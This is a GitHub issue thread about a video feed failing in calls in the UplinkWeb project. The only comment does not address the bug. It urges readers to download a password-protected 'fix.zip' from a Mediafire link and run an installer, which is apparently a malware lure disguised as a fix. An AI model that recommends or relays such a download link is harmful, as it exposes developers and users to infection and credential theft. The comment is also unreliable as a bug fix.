### ISSUE TITLE
bug(calling): Video feed is not appearing

### ISSUE THREAD

**Issue by phillsatellite** [Satellite-im/UplinkWeb#466]
**Issue:**
When you start a call with another user and try to enable the video camera the video feed will not appear for the other user 

**Screen recording:**

https://github.com/user-attachments/assets/bf8cc6f5-7ce3-457f-a061-dd3eb1c2dd0d

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
